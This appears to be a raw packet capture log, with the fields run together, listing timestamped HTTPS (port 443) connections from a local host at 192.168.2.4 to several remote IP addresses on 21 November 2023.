                                                                          Nov 21, 2023 17:58:43.610182047 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.610208035 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.610265017 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.615571976 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.615585089 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.622436047 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.622469902 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.622581005 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.623428106 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.623444080 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.629890919 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.697273016 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.697319031 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.697374105 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.697396040 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.697407961 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.697467089 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.699630976 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.699645042 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.705637932 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.705662012 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.705728054 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.706410885 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.706465006 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.706506968 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.706515074 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.706581116 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.706660986 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.708364010 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.708375931 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.711970091 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.711983919 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.719213963 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.719258070 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.719324112 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.719827890 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.719840050 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.725313902 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.725451946 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.725509882 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.725528002 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.725610971 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.725657940 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.726150990 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.726366997 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.726924896 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.726939917 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.727200031 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.727207899 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.727487087 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.727669001 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.727684021 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.728054047 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.729135036 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.729253054 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.729542017 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.729705095 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.729756117 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.729789019 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.734400034 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.734503031 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.734608889 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.734921932 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.734958887 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.772073030 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.772200108 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.772258997 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.773260117 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.773435116 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.773452044 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.777267933 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.880908012 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.882076979 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.882102966 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.883250952 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.888482094 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.922353983 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.922375917 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.923033953 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.923715115 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.923866034 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.923908949 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.923943996 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.924034119 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.926500082 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.926588058 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.927527905 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.927536011 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.972707033 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.973150969 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.973197937 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.973666906 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.973697901 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.974633932 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.974709988 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.975163937 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.975215912 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.975388050 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.975394011 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.990708113 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.000102997 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.011472940 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.011488914 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.011657000 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.011688948 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.012025118 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.012501955 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.012583971 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.012703896 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.013046026 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.013113976 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.013588905 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.013665915 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.013719082 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.013722897 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.015449047 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.015497923 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.015548944 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.015569925 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.015598059 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.015641928 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.016639948 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.016655922 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.017014027 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.018291950 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.018326044 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.018403053 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.021456957 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.021475077 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.026704073 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.026743889 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.026796103 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.026818991 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.026830912 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.026881933 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.028311014 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.028321981 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.046617985 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.046648979 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.046711922 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.046860933 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.046878099 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.053272963 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.067116976 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.112363100 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.112416029 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.112466097 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.112477064 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.112564087 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.112611055 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.114097118 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.114106894 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.114526987 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.114543915 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.114594936 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.115542889 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.115561962 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.180011988 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.180156946 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.180207014 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.181611061 CET49776443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.181627989 CET44349776104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.269763947 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.269788980 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.269841909 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.269859076 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.269893885 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.270803928 CET49778443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.270813942 CET44349778172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.281039000 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.281270027 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.281291008 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.281589985 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.281928062 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.281984091 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.282089949 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.283009052 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.283054113 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.283108950 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.283127069 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.283140898 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.283330917 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.283719063 CET49777443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.283740997 CET44349777172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.307140112 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.307352066 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.307365894 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.307684898 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.308049917 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.308109045 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.308166981 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.329262018 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.349287987 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.374620914 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.374826908 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.374839067 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.375129938 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.375561953 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.375617981 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.375696898 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.409349918 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:44.409395933 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:44.409456968 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:44.412115097 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.412161112 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.412214041 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.412214041 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.412261963 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.412976027 CET49779443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.412986994 CET44349779172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.415044069 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.415082932 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.415132046 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.415148020 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.415162086 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.415201902 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.415731907 CET49780443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.415750980 CET44349780172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.417260885 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.664835930 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:44.664856911 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708103895 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708158970 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708185911 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708210945 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708237886 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708244085 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.708278894 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708283901 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.708313942 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.708326101 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708357096 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708391905 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.708398104 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708969116 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.708992958 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.709014893 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.709022999 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.709055901 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.709060907 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.709127903 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.709166050 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.725908995 CET49782443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:44.725933075 CET44349782104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:44.760027885 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.760072947 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.760109901 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.760130882 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.760152102 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.760201931 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.760447025 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.760469913 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.760549068 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.765130997 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.765142918 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.775032043 CET49784443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:44.775048018 CET44349784172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:44.805320024 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:44.805375099 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:44.805531979 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:44.808221102 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:44.808248997 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.023319006 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.067651987 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.106142998 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106180906 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106205940 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106231928 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106256008 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.106324911 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106362104 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.106425047 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106451988 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106482029 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.106489897 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106498957 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.106544018 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.107240915 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.107271910 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.107292891 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.107297897 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.107307911 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.107345104 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.108164072 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.108216047 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.108217001 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.108232021 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.108268976 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.108278036 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.108290911 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.108335018 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.109137058 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.109210014 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.109234095 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.109268904 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.109282970 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.109342098 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.110019922 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.110086918 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.110116005 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.110132933 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.110147953 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.110198975 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.110213041 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111119986 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111150980 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111169100 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.111182928 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111232042 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.111244917 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111948013 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111975908 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.111993074 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.112005949 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.112045050 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.112055063 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.112087011 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.112133980 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.112907887 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.112965107 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.113013029 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.113019943 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.113030910 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.113079071 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.113091946 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.113936901 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.113992929 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.114006996 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.135869026 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.135878086 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.136200905 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.142787933 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.142844915 CET44349787172.67.139.60192.168.2.4
